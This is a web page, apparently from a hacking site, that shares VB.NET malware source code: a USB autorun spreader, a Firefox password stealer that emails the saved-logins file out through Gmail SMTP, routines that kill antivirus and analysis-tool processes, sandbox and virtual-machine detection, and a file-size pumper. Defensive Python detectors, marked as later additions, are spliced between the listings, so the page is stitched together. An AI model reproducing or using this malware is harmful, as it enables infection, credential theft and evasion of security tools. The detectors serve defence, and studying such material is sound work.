Malicious code boulix

The Hidden Side of Viruses, Trojans and Malware (VB.NET)

Today we are going to look at a certain hidden side of malware, viruses and trojans: the source codes shared on the site let us learn more about how they behave!

The Boulix.net team will under no circumstances help you compile these source codes. Before you start, visit the "Rules" page if you have not already done so.

Here are the source codes being shared:

USB Spreader – This module injects a Windows executable as soon as a USB key is plugged into a PC (if the PC is compatible, of course).
Firefox Stealer – This one retrieves the passwords saved on your machine.
Anti-Sandboxie – By Sora – This module temporarily disables the Sandboxie software.
Anti Adware – By Rapid91 – The same thing, but for the Ad-Aware software.
Keyscrambler, Wireshark, Anubis, Malwarebytes, Kaspersky, Ollydbg, Outpost, Norman, Bit Defender, Nod32, Zone Alarm – Disabling.
Anti Kaspersky, Anubis, Sandboxie, Virtual Box, VMWare, Virtual PC, and WireShark – Anti-anti-virus 😀
Anti: Anubis, Outpost, Norman, Bitdefender, Kaspersky, Nod32, Zone Alarm – Anti-anti-virus 😀
Exe Pumper – This interesting piece of code adds useless code to an application in order to inflate the file size!
————————————————–


USB Spreader

Sub USBInfect() On Error Resume Next My.Computer.Registry.SetValue(« HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced », « Hidden », « 0 », Microsoft.Win32.RegistryValueKind.DWord) Dim sDrive As String, sDrives() As String, xDrive As String = My.Computer.FileSystem.SpecialDirectories.ProgramFiles sDrives = System.IO.Directory.GetLogicalDrives For Each sDrive In sDrives If xDrive.Contains(sDrive) Then Else My.Computer.FileSystem.CopyFile(Application.ExecutablePath, sDrive & « HDDFile.com », True, FileIO.UICancelOption.DoNothing) My.Computer.FileSystem.WriteAllText(sDrive & « autorun.inf », « [autorun] » & vbCrLf & « open= » & sDrive & « HDDFile.com » & vbCrLf & « shellexecute= » & sDrive, True) SetAttr(sDrive & « HDDFile.com », FileAttribute.Hidden) SetAttr(sDrive & « autorun.inf », FileAttribute.Hidden) End If Next End Sub
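For defenders, the drop pattern in the listing above (an `autorun.inf` whose `open=` entry points at an executable in the drive root, with both files marked hidden) can be checked on a removable volume. The following Python is an added example, not code from the original post; the function names, the extension list and the `hidden_files` parameter (a list of file names the caller found with the Hidden attribute set) are assumptions of this sketch.

```python
import ntpath
import re

EXEC_EXT = {".exe", ".com", ".scr", ".pif", ".bat", ".cmd", ".vbs", ".js"}

def parse_autorun(text):
    """Return {key: value} for the [autorun] section (keys lower-cased)."""
    entries, in_section = {}, False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            in_section = line[1:-1].strip().lower() == "autorun"
        elif in_section and "=" in line:
            key, _, value = line.partition("=")
            entries[key.strip().lower()] = value.strip()
    return entries

def launch_target(value):
    """File name of the program a launch entry points at ('' if none)."""
    m = re.match(r'"([^"]+)"|(\S+)', value)
    return ntpath.basename(m.group(1) or m.group(2)) if m else ""

def audit_autorun(text, hidden_files=()):
    """List the reasons an autorun.inf matches the spreader's drop pattern."""
    hidden = {name.lower() for name in hidden_files}
    findings = []
    for key, value in parse_autorun(text).items():
        is_launch = key in ("open", "shellexecute") or (
            key.startswith("shell\\") and key.endswith("\\command"))
        target = launch_target(value) if is_launch else ""
        if ntpath.splitext(target)[1].lower() in EXEC_EXT:
            findings.append(f"{key} launches executable {target}")
            if target.lower() in hidden:
                findings.append(f"{target} is hidden on the volume")
    if findings and "autorun.inf" in hidden:
        findings.append("autorun.inf itself is hidden")
    return findings

# Constructed sample mirroring the file the listing above writes to drive E:.
SAMPLE = "[autorun]\r\nopen=E:\\HDDFile.com\r\nshellexecute=E:\\\r\n"

if __name__ == "__main__":
    for finding in audit_autorun(SAMPLE, ["HDDFile.com", "autorun.inf"]):
        print(finding)
```

An installer disc that only sets `icon=` or `label=` produces no findings, so the check separates cosmetic autorun files from ones that launch a program.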

Firefox Stealer

Imports Microsoft.VisualBasic Imports System Imports System.Collections.Generic Imports System.IO Imports System.Net.Mail Imports System.Net Imports System.Text Imports System.Runtime.InteropServices Namespace ConsoleApplication1 Friend Class Program <DllImport(« kernel32.dll »)> _ Public Shared Function FreeConsole() As Boolean End Function Shared Sub Main(ByVal args() As String) FreeConsole() Try Dim FileFound As Boolean = False Dim Username As String = « [email protected] » Dim Password As String = « password » Dim Default As String = Environment.GetEnvironmentVariable(« APPDATA ») & « \Mozilla\Firefox\Profiles » Dim Dirs() As String = Directory.GetDirectories(Default) For Each dir As String In Dirs If (Not FileFound) Then Dim Files() As String = Directory.GetFiles(dir) For Each CurrFile As String In Files If (Not FileFound) Then If System.Text.RegularExpressions.Regex.IsMatch(CurrFile, « signons3.txt ») Then Dim Client As New SmtpClient(« smtp.gmail.com », 587) Client.EnableSsl = True Dim Creds As New NetworkCredential(Username, Password) Client.Credentials = Creds Dim msg As New MailMessage() msg.To.Add(New MailAddress(« [email protected] »)) msg.From = New MailAddress(Username) msg.Attachments.Add(New Attachment(CurrFile)) msg.Subject = « [Stolen]FF Passes[Rusty_v] » Client.Send(msg) FileFound = True End If Else Exit For End If Next CurrFile Else Exit For End If Next dir Catch End Try End Sub End Class End Namespace

Anti-Sandboxie - By Sora :

‘ Anti-Sandboxie Example ‘ Sora Option Explict Private Declare Function GetModuleHandle Lib « kernel32 » Alias « GetModuleHandleA » (ByVal lpModuleName As String) As Long Public Sub CompName() Dim Sandboxie as Boolean If GetModuleHandle(« SbieDll.dll ») Then Sandboxie = True If Sandboxie = True Then MsgBox « Sandboxie Detected » End If End Sub

Anti Adware - By Rapid91 :

‘Coded By Rue Port By Rapid91 Imports System.Runtime.InteropServices <DllImport(« kernel32.dll », CharSet := CharSet.Auto, SetLastError := True)> _ Public Shared Function DeleteFile(ByVal path As String) As Boolean End Function Shared Sub AdAware() Dim AdAwarePaths As New List(Of String)() Dim ProgramFiles As String = Shell32.GetCSIDLPath(Shell32.CSIDL.CSIDL_PROGRAM_FILES) AdAwarePaths.Add(ProgramFiles & « \Lavasoft\ ») For Each path As String In AdAwarePaths ‘Coded by Rue If Directory.Exists(path) Then Dim dirInfo As New DirectoryInfo(path) Dim dirFiles() As FileInfo = dirInfo.GetFiles(« *.* », SearchOption.AllDirectories) For Each file As FileInfo In dirFiles Try Kernel32.DeleteFile(file.FullName) Catch Continue For End Try Next file End If Next path Dim rmLMADKeys As RegistryKey = Registry.LocalMachine.OpenSubKey(« Software\Lavasoft\Ad-Aware\ », True) ‘Coded by Rue Dim LMValues() As String = rmLMADKeys.GetValueNames() For Each key As String In LMValues Try rmLMADKeys.DeleteValue(key) Catch Continue For End Try Next key rmLMADKeys.Close() End Sub

Keyscrambler, Wireshark, Anubis, Malwarebytes, Kaspersky, Ollydbg, Outpost, Norman, Bit Defender, Nod32, Zone Alarm :

‘—————General Dee’s Proccess Killers————- ‘———–Example Usage: « Anti-Keyscrambler() »—– ‘—————Permission: To Use With Credits———- ‘—————Coded: Visual Basic 2008——————- ‘Kills Keyscrambler, Wireshark, Anubis, Malwarebytes, Kaspersky, Ollydbg, Outpost, Norman,Bit Defender, Nod32, Zone Alarm’————————Keyscrambler—————————- Sub Anti-Keyscrambler() Dim generaldee As Process() = Process.GetProcesses Dim i As Integer For i = 0 To generaldee.Length – 1 Select Case Strings.LCase(generaldee(i).ProcessName) Case « keyscrambler » generaldee(i).Kill() Case Else End Select Next Else End Sub’————————Wireshark—————————- Sub Anti-Wireshark() Dim generaldee As Process() = Process.GetProcesses Dim i As Integer For i = 0 To generaldee.Length – 1 Select Case Strings.LCase(generaldee(i).ProcessName) Case « wireshark » generaldee(i).Kill() Case Else End Select Next Else End Sub ‘—————————-Anubis——————————– Sub Anti-Anubis() Dim generaldee As Process() = Process.GetProcesses Dim i As Integer For i = 0 To generaldee.Length – 1 Select Case Strings.LCase(generaldee(i).ProcessName) Case « anubis » generaldee(i).Kill() Case Else End Select Next Else End Sub ‘————————Malwarebytes—————————- Sub Anti-Malwarebytes() Dim generaldee As Process() = Process.GetProcesses Dim i As Integer For i = 0 To generaldee.Length – 1 Select Case Strings.LCase(generaldee(i).ProcessName) Case « mbam » generaldee(i).Kill() Case Else End Select Next Else End Sub ‘————————Kaspersky—————————- Sub Anti-Kaspersky() Dim generaldee As Process() = Process.GetProcesses Dim i As Integer For i = 0 To generaldee.Length – 1 Select Case Strings.LCase(generaldee(i).ProcessName) Case « avp » generaldee(i).Kill() Case Else End Select Next Else End Sub ‘———————–Ollydbg——————————— Sub Anti-Ollydbg() Dim generaldee As Process() = Process.GetProcesses Dim i As Integer For i = 0 To generaldee.Length – 1 Select Case Strings.LCase(generaldee(i).ProcessName) Case « ollydbg » generaldee(i).Kill() Case Else End Select Next Else End Sub 
‘———————–Outpost——————————— Sub Anti-Outpost() Dim generaldee As Process() = Process.GetProcesses Dim i As Integer For i = 0 To generaldee.Length – 1 Select Case Strings.LCase(generaldee(i).ProcessName) Case « outpost » generaldee(i).Kill() Case Else End Select Next Else End Sub ‘———————–Norman—————————— Sub Anti-Norman() Dim generaldee As Process() = Process.GetProcesses Dim i As Integer For i = 0 To generaldee.Length – 1 Select Case Strings.LCase(generaldee(i).ProcessName) Case « npfmsg » generaldee(i).Kill() Case Else End Select Next Else End Sub ‘———————–Bit Defender—————————— Sub Anti-BitDefender() Dim generaldee As Process() = Process.GetProcesses Dim i As Integer For i = 0 To generaldee.Length – 1 Select Case Strings.LCase(generaldee(i).ProcessName) Case « bdagent » generaldee(i).Kill() Case Else End Select Next Else End Sub ‘———————–NOD32—————————— Sub Anti-NOD32() Dim generaldee As Process() = Process.GetProcesses Dim i As Integer For i = 0 To generaldee.Length – 1 Select Case Strings.LCase(generaldee(i).ProcessName) Case « egui » generaldee(i).Kill() Case Else End Select Next Else End Sub ‘———————–Zone Alarm—————————— Sub Anti-ZoneAlarm() Dim generaldee As Process() = Process.GetProcesses Dim i As Integer For i = 0 To generaldee.Length – 1 Select Case Strings.LCase(generaldee(i).ProcessName) Case « zlclient » generaldee(i).Kill() Case Else End Select Next Else End Sub

Anti Kaspersky, Anubis, Sandboxie, Virtual Box, VMWare, Virtual PC, and WireShark :

Imports Microsoft.Win32 Module Antis Dim Devices As Object, Grafikadapter As String, RegionA As String = « SELECT * FROM Win32_VideoController » Dim regPID As RegistryKey = Registry.LocalMachine.OpenSubKey(« SOFTWARE\Microsoft\Windows NT\CurrentVersion », False) Dim pid As Object = regPID.GetValue(« ProductId ») Dim id As String = « 76487-337-8429955-22614 » Public Function antiKAV() As Boolean On Error GoTo error1 If Process.GetProcessesByName(« avp »).Length >= 1 Then Return True Else Return False End If Exit Function error1: End End Function Private Sub AntiWireShark() Dim ProcessList As System.Diagnostics.Process() ProcessList = System.Diagnostics.Process.GetProcesses() Dim Proc As System.Diagnostics.Process Dim title As String For Each Proc In ProcessList title = Proc.MainWindowTitle If (String.Equals(title, « The Wireshark Network Analyzer »)) Then Proc.Kill() End If Next End Sub Public Function antiSandboxie() As Boolean On Error GoTo error1 If Process.GetProcessesByName(« SbieSvc »).Length >= 1 Then Return True Else Return False End If Exit Function error1: End End Function Public Function antiAnubis() As Boolean On Error GoTo error1 Dim folder As String = Application.StartupPath Dim getFile As String = folder & « \sample.exe » If Application.ExecutablePath = getFile Then Return True Else Return False End If Exit Function error1: End End Function Public Function antiAnubis2() As Boolean On Error GoTo error1 If pid = id Then Return True Else Return False End If Exit Function error1: End End Function Public Function AntiVirtualBox() As Boolean On Error GoTo error1 Call getDevices() Select Case Grafikadapter Case « VirtualBox Graphics Adapter » Return True Case Else Return False End Select Exit Function error1: End End Function Public Function AntiVmWare() As Boolean On Error GoTo error1 Call getDevices() Select Case Grafikadapter Case « VMware SVGA II » Return True Case Else Return False End Select Exit Function error1: End End Function Public Function 
AntiVirtualPC() As Boolean On Error GoTo error1 Call getDevices() Select Case Grafikadapter Case « VM Additions S3 Trio32/64 » Return True Case Else Return False End Select Exit Function error1: End End Function Private Sub getDevices() On Error GoTo error1 Devices = GetObject(« winmgmts: »).ExecQuery(RegionA) For Each AdaptList In Devices Grafikadapter = AdaptList.Description Next Exit Sub error1: End End Sub End Module

Anti: Anubis, Outpost, Norman, Bitdefender, Kaspersky, Nod32, Zone Alarm :

Dim local As Process() = Process.GetProcesses Dim i As Integer For i = 0 To local.Length – 1 Debug.WriteLine(local(i).ProcessName) If Strings.UCase(local(i).ProcessName) = Strings.UCase(« sample ») Then ‘Anubis local(i).Kill() If Strings.UCase(local(i).ProcessName) = Strings.UCase(« outpost ») Then ‘Outpost local(i).Kill() If Strings.UCase(local(i).ProcessName) = Strings.UCase(« npfmsg ») Then ‘Norman local(i).Kill() If Strings.UCase(local(i).ProcessName) = Strings.UCase(« bdagent ») Then ‘Bitdefender local(i).Kill() If Strings.UCase(local(i).ProcessName) = Strings.UCase(« kavsvc ») Then ‘Kaspersky local(i).Kill() If Strings.UCase(local(i).ProcessName) = Strings.UCase(« egui ») Then ‘Nod32 local(i).Kill() If Strings.UCase(local(i).ProcessName) = Strings.UCase(« zlclient ») Then ‘Zonealarm local(i).Kill() End If End If End If End If End If End If End If Next
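The three "anti" listings above all depend on hard-coded names of security tools, sandbox modules and virtual display adapters, which makes those names useful for static triage of an unknown binary. The following Python is an added example, not code from the original post: it searches a file's bytes for the names that appear in the listings, both as UTF-16LE (how .NET stores string literals) and, for longer names, as ASCII. The grouping, the threshold and the function names are assumptions of this sketch.

```python
# Names copied from the listings on this page, grouped by how the code uses them.
INDICATORS = {
    "process-kill target": ["keyscrambler", "wireshark", "anubis", "ollydbg",
                            "outpost", "npfmsg", "bdagent", "zlclient",
                            "kavsvc", "mbam", "egui", "avp"],
    "sandbox check": ["SbieDll.dll", "SbieSvc"],
    "VM check": ["VirtualBox Graphics Adapter", "VMware SVGA II",
                 "VM Additions S3 Trio32/64"],
}

def find_indicators(data, min_ascii_len=6):
    """Return {category: [names]} for every listed name present in data."""
    hay = data.lower()            # bytes.lower() only folds ASCII letters
    hits = {}
    for category, names in INDICATORS.items():
        for name in names:
            low = name.lower()
            wide = low.encode("utf-16-le")
            # Short names such as "avp" are too noisy as plain ASCII substrings.
            ascii_ok = len(low) >= min_ascii_len and low.encode("ascii") in hay
            if wide in hay or ascii_ok:
                hits.setdefault(category, []).append(name)
    return hits

def triage(data, threshold=3):
    """Flag a file that embeds at least `threshold` distinct listed names."""
    hits = find_indicators(data)
    total = sum(len(names) for names in hits.values())
    return {"hits": hits, "suspicious": total >= threshold}

# Constructed sample: three of the names stored as UTF-16LE string literals.
SAMPLE_BLOB = (b"\x00\x01" + "wireshark".encode("utf-16-le") + b"\x00\x00"
               + "avp".encode("utf-16-le")
               + "VMware SVGA II".encode("utf-16-le"))

if __name__ == "__main__":
    print(triage(SAMPLE_BLOB))
    print(triage(b"Wireshark capture helper"))   # one name only: not flagged
```

A single hit is common in legitimate software, which is why the result is only marked suspicious when several distinct names occur together.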

Exe Pumper :

Imports System Imports System.ComponentModel Imports System.IO Imports System.Windows.FormsNamespace AddBytes Public Partial Class Form1 Inherits Form Public Sub New() InitializeComponent() End SubPrivate Sub Form1_Load(ByVal sender As Object, ByVal e As EventArgs) End Sub Private Sub button1_Click(ByVal sender As Object, ByVal e As EventArgs) Dim file__1 = File.OpenWrite(textBox1.Text) Dim siza = file__1.Seek(0, SeekOrigin.[End]) Dim size = Convert.ToInt32(textBox2.Text) Dim bite As Decimal = size * 1048576 While siza < bite siza += 1 file__1.WriteByte(0) End While file__1.Close() MessageBox.Show(« Done ! ») End Sub Private Sub button2_Click(ByVal sender As Object, ByVal e As EventArgs) openFileDialog1.DefaultExt = « exe » openFileDialog1.Filter = « exe files (*.exe)|*.exe » openFileDialog1.FilterIndex = 1 If openFileDialog1.ShowDialog(Me) = DialogResult.OK Then textBox1.Text = String.Empty textBox1.Text = openFileDialog1.FileName End If End Sub Private Sub openFileDialog1_FileOk(ByVal sender As Object, ByVal e As CancelEventArgs) End Sub End Class End Namespace
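Padding of the kind the listing above produces (zero bytes written after the end of the file until it reaches a chosen size in MB) shows up as a large, all-zero overlay behind the last PE section. The following Python is an added example, not code from the original post: it reads the PE section table, measures the overlay and reports how much of it is zero. The thresholds, function names and the sample buffer are assumptions of this sketch.

```python
import struct

MB = 1048576  # same constant the listing multiplies the requested size by

def pe_overlay(data):
    """Return (overlay_offset, overlay_length, zero_fraction) for a PE image."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("not an MZ/PE file")
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    (n_sections,) = struct.unpack_from("<H", data, e_lfanew + 6)
    (opt_size,) = struct.unpack_from("<H", data, e_lfanew + 20)
    table = e_lfanew + 24 + opt_size          # first section header
    end = table + 40 * n_sections             # headers always count as image
    for i in range(n_sections):
        raw_size, raw_ptr = struct.unpack_from("<II", data, table + 40 * i + 16)
        if raw_size:
            end = max(end, raw_ptr + raw_size)
    end = min(end, len(data))
    overlay = data[end:]
    zero_fraction = overlay.count(0) / len(overlay) if overlay else 0.0
    return end, len(overlay), zero_fraction

def looks_pumped(data, min_overlay=MB, min_zero_fraction=0.99):
    """True when a large, almost all-zero overlay follows the last section."""
    _, length, zero_fraction = pe_overlay(data)
    return length >= min_overlay and zero_fraction >= min_zero_fraction

def build_sample_pe(section_bytes=512):
    """Constructed, non-executable PE-shaped buffer with one raw section."""
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 0, 0x102)
    section = b".text\0\0\0" + struct.pack("<IIII", section_bytes, 0x1000,
                                           section_bytes, 0x200) + b"\0" * 16
    head = dos + b"PE\0\0" + coff + section
    return head.ljust(0x200, b"\0") + b"\x90" * section_bytes

if __name__ == "__main__":
    clean = build_sample_pe()
    padded = clean.ljust(2 * MB, b"\0")       # zero-filled up to 2 MB in total
    print(pe_overlay(clean), looks_pumped(clean))
    print(pe_overlay(padded), looks_pumped(padded))
```

Installer payloads and Authenticode signatures also sit in the overlay, so the zero fraction rather than the overlay size alone is what distinguishes padding from real appended data.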

———————————————————–
That's it, we're done. The simplest software for programming in VB.NET is Visual Basic Express! 😀
Of course, most of these codes are detected; an upcoming tutorial will look at antivirus detections.
🙂
